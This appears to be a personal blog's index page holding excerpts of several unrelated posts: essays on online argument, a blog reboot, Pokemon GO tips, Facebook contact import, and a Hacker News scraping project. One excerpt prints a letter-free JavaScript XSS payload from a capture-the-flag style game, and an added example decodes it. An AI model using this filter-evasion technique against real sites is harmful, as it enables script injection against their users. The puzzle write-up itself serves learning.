The Map to Nowhere: Intellectual denial of service attacks, part 2

Stick ’em up, you were wrong on the internet

In my first post on intellectual denial of service attacks, I covered something I dubbed “bad infinitum,” a tendency for non-experts to overwhelm experts with repetitive, costly, and often unproductive demands for evidence or counter-argument to oft-debunked or misleading claims. Here, I’ll cover another of these intellectual attack vectors, which I’ll call “the map to nowhere.” An asymmetry exists in each of these attacks: easy to launch, hard to counter.

Many responses to my first post mentioned the need for a renewed trust of experts. I’m not so sure of this. The squelching of productive conversation can go both ways, as I hope to describe.

(Aside: In a comment on Hacker News, tinono mentioned noticing a similarity with Paul Graham’s essay, “Keep Your Identity Small,” in my comment about not wanting to go back on previously-stated beliefs. His essay greatly influenced my thinking on the topic, and it deserves your attention if you haven’t read it.)


Intellectual denial of service attacks

We live in an era that devalues conformity, while simultaneously preserving it in many interesting ways. Everyone is allowed to have an opinion. Divergent views produce conflict, however, and disagreement, argument, and debate define our current moment.

If we merely disagreed on matters of taste – our favorite color, music, movies, etc. – we could avoid such conflicts. Increasingly, though, we disagree on more fundamental ideas. Some deny the spherical shape of the Earth and the heliocentric model of the solar system (I highly recommend Behind the Curve, a movie about this movement). Arguments of all shapes and sizes spring up everywhere: capitalism vs. socialism, humanity’s role in climate change, on and on.

The democratization of virality amplifies these disagreements. Previously obscure ideas can quickly become widely known. Competing ideological camps endlessly try to score points on one another. The internet rewards this behavior with fame and other social capital. Various forms of what I’ll call “intellectual denial of service” act to reinforce this dynamic. I’ll describe one of these attack vectors in this post.


Hello, world

Techiavelli

Anyone who read my post yesterday is probably confused by 1) this domain name and 2) my mention of it being my “first post”. This blog is a reboot of my previous site (where the older posts came from). I’m starting over in hopes that it will incentivize me to take blogging seriously again. This post will explain my plans for this blog, and with any luck, convince you to come along for that ride. I had imagined writing a longer and more thoughtful introduction, but events have conspired to force my hand. When in doubt, start.

… one must never allow disorder to continue so as to escape a war. Anyhow one does not escape; the war is merely postponed to one’s disadvantage.

Machiavelli, The Prince

For several years, I fell out of the habit of writing regularly. I would occasionally post something on Medium, but mostly I just lapsed into silence (except on Twitter, where I’m rather noisy). Inertia took hold, and the habit of not writing eventually replaced my habit of regularly doing so. I regret this mistake.

Writing clarifies thinking. It also preserves a record of unadulterated and imperfect thought. Reading old blog posts of mine, I get a sense of what was in my mind at the time of writing. I can see specific patterns or beliefs that I’ve since outgrown, but also interesting ideas that I had lost and forgotten. To make up for my sloth, I’ll be writing one post a day for a little while. So much thought has gunked up my brain without being released that it’s time for a core dump.


What goes up…

It’s never a good time to suddenly find yourself jobless. But it’s never a bad time to evaluate your skills, your goals, and where you’re headed.

We all want to be a valued member of a winning team on an inspiring mission

Graham Weston

It’s easy to get complacent after a few years in a good job. You tell yourself, “I’m doing such important work! We’re making so much progress! I love my team!” You’re churning out pull requests, responding to emails and Slack messages, burning through your JIRA backlog.

Then, one day, it all stops.


21 Tips and Resources for The Obsessed Pokemon GO Player

I’ve become somewhat obsessed with Pokemon GO since I started playing it, and I’ve been trying to cobble together a mental guide for how to be successful from a hodge-podge of sites, people I’ve met while playing the game, and some of my own experiences. Here’s what I’ve got so far. Items in red are ones I’m less sure of.

Finding Pokemon

  1. The panel at the bottom right tells you what Pokemon are near. 3 feet = far, 2 feet = nearby, 1 foot = close, none = very close
  2. The Pokemon in the panel are arranged by closeness. Watching how they re-arrange as you walk in one direction will tell you if you’re hot or cold. Work together with friends to cover a wider area
  3. Rustling grass patches aren’t necessarily Pokemon. They may be nearby, though
  4. Look for Pokemon GO maps of your city on reddit. You can also use the official Ingress map for a rough guide, but you have to sign up for an account, which I didn’t bother to do.
    1. Bonus! For those lucky enough to live in Austin, here’s a user-created map of the various locations of note
  5. Some Pokemon are easiest to get by hatching eggs. Check out this list of Pokemon with the distance required to hatch their egg to get an idea of what each of your eggs might be
  6. Incense seems to mostly attract common Pokemon, so it’s useful when you’re trying to catch a few to level up
  7. Walking along roadways SEEMS to yield fairly weak results. Try finding parks and other open areas that are high in pedestrian traffic. There also doesn’t seem to be any universal rarity scale – it appears to be dependent on where you are, so look around when you’re far from home!

Once You Find Them

  1. Spinning your pokeball with your finger (swiping to the side) before throwing it makes you throw a curveball, which gives you a 10XP bonus. It MIGHT make your throw more effective too, but I’m not sure about this
  2. Hitting a Pokemon in the colored circle, when the circle is small, gives you the best chance to capture it. Hit it outside the colored circle, or when the circle is bigger, and it’ll be harder
  3. Waiting to evolve your Pokemon until you’re a higher level will improve the boost in CP your Pokemon gets

Getting Items

  1. Poke Stops regenerate after a few minutes. If you find a comfortable spot, hit one a few times. If you’re surrounded by them, walk in a circuit so that the first one is recharged by the time you return to it
  2. Controlling a gym for 21 hours gives you a small number of Poke-coins that you can spend in the store. Work with teammates to help lock down gyms

Battling Other Players

  1. To train your Pokemon, go to a gym owned by your team and tap the boxing glove icon to train against the Pokemon at that gym
  2. Leaving a Pokemon at a friendly-controlled gym will help strengthen it against rival teams, since rivals will have to defeat your Pokemon before taking on the gym’s master
  3. Here’s Niantic’s guide for attacking a rival-controlled gym, and using attacks in general

Battling the App

  1. Carry around a battery pack for your phone. Seriously.
  2. Turn on the “battery saver” and turn your phone upside down. It will dim the screen, vibrating when there is a Pokemon nearby
  3. Disabling the AR feature saves some battery, and sanity (you won’t have to turn around constantly trying to find your Pokemon)
  4. If you want to get really hardcore, you could buy a Pokemon GO wearable for ~$200 on eBay so you don’t have to stare at your phone constantly (they supposedly ship in late July). Caveat emptor. Pre-orders sold out, but Nintendo will probably offer them for sale again in the near future given the game’s popularity
  5. Be aware that, on iOS at the moment, you’ll be giving up full access to your Google account if you log in with it. Niantic says they’re working on a fix, but in the meantime, maybe try creating a Trainer account instead
  6. All those people you see huddled around popular Poke stops, pacing around while staring at their phones? Go talk to them – they probably know something that you and I don’t!

Good luck out there!

Where do those “Recommended Friends” come from?

Have you ever logged onto Facebook to find “Recommended Friends” that you didn’t expect to see? Maybe someone you briefly met on Tinder, or a co-worker you hate? I think many people are unaware that, by default, the Facebook app on mobile devices automatically imports your contact list, continuously (this includes, so far as I can tell, every piece of information about them that you have stored).

I started noticing this a long time ago, but I sense that there are many who just assume Facebook is omniscient and don’t give it another thought. There are many reasons you may not want to give up this power, and so far as I can tell, the only way to stop importing this information is to delete the Facebook app from your phone. If anyone is aware of a specific privacy setting one can use to disable this behavior, leave a comment on this post!

If you’ve already unwittingly imported your contacts (you can see them here) and want to remove them, click here.

Analyzing ~425 days of Hacker News posts with standard shell commands

(About) 425 days ago (at the time of this writing) I started scraping Hacker News via its shiny new API. And then I promptly forgot about it. That is, until I noticed my cronjob had been throwing errors constantly for a few weeks:

Traceback (most recent call last):
  File "/home/dummy/projects/hn-cron/hn.py", line 62, in <module>
    main()
  File "/home/dummy/projects/hn-cron/hn.py", line 53, in main
    log_line = str(details['id']) + "\t" + details['title'] + "\t" + details['url'] + "\t" + str(details['score']) + "\n"
KeyError: 'url'

Instead of fixing anything, I just commented out the cronjob. But now I feel somewhat obligated to do at least a rudimentary analysis of this data. In keeping with my extreme negligence/laziness throughout this project, I hacked together a few bash commands to do just that.

A few notes about this data, and the (in)accuracy thereof:

  1. The script ran once every 40 minutes, collecting the 30 most popular stories (i.e. those on the front page), and adding them to the list if they were new
  2. I only know I started roughly 425 days ago because the first link in log.txt was this one right here (Who needs timestamps? I have IDs!)
  3. A not-insignificant percent (probably ~10%) of the time, the script would fail because the stupid(, stupid, stupid) Python 2 script I banged out in 10 minutes didn’t know how to handle Unicode characters properly (oops).
  4. I saved everything to a tab-delimited flat file. I probably should’ve used something else, but I didn’t, so here we are.
  5. I only saved the score from the first time a story was found, so theoretically any given post only had an arbitrary 40 minute window to accumulate points, at most. This is probably not strictly true for a number of reasons, but I’m going to pretend it is.
  6. These bash commands grew organically (often with much help from StackOverflow), so they made sense to me at the time, but YMMV
  7. The data is probably inaccurate in a million small ways, but overall, it’s at least worth poking at.

Okay, let’s get down to it!


Constructing an XSS vector, using no letters

At the risk of spoiling a somewhat-well-known XSS game, I want to share an XSS vector I had never thought of before it forced me to. The premise of this level was, essentially, that you couldn’t use any letters whatsoever in the attack vector, and you had to call alert(1).

So, without further ado, here it is:

""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

What a mess, right?! What the hell are we doing here? Let’s take it piece-by-piece.
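The fragments of the payload above, evaluated one at a time without making the final call (an added example, not part of the original post). The function names and the letter-rejecting regex are assumptions made for illustration; the fragments themselves are copied from the payload.

```javascript
// Added example: decodes the payload's fragments; it never invokes the result.
// Function names are hypothetical. Every fragment indexes into one of these:
const FALSE_STR = !1 + "";   // "false"
const TRUE_STR = !0 + "";    // "true"
const OBJ_STR = '' + {};     // "[object Object]"

// First bracket: a property name looked up on the empty string.
function firstProperty() {
  return (!1+"")[3]+(!0+"")[2]+(''+{})[2];
}

// Second bracket: looked up on the method found above. The one letter the three
// coercions lack is taken from that method's own source text.
function secondProperty() {
  const method = ""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]];
  return (''+{})[5]+(''+{})[1]+(method+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]
    +(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1];
}

// Argument: the source text handed to whatever the two lookups return.
function bodyString() {
  return ((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)";
}

// The object the payload ends up calling with bodyString().
function callTarget() {
  return ""[firstProperty()][secondProperty()];
}

// Assumed form of the level's rule: reject any input that contains a letter.
function passesNoLetterFilter(input) {
  return !/[a-z]/i.test(input);
}

// The payload from the post, held as inert text.
const PAYLOAD = String.raw`""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()`;

console.log(FALSE_STR, TRUE_STR, OBJ_STR);
console.log(firstProperty(), secondProperty(), bodyString());
console.log("call target is Function:", callTarget() === Function);
console.log("passes the no-letter filter:", passesNoLetterFilter(PAYLOAD));
```

The text only becomes code at the `Function` constructor, which a Content-Security-Policy without `'unsafe-eval'` refuses to run; a character blocklist never sees a letter to reject.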


dot-man

I recently hacked together a little 300-line bash script to manage my dotfiles called dot-man. Basically, it will let you manage your dotfiles in a git repository, and you can run it every so often to keep your local / remote dotfiles up to date.

Install is as simple as:

git clone git@github.com:cneill/dot-man.git
OR
git clone https://github.com/cneill/dot-man.git

Let me know what you think! You can find me on Twitter @ccneill.